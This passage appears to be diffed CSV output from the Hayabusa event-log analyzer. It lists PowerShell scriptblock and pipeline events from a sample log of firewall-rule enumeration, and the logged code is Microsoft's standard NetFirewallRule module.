$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains 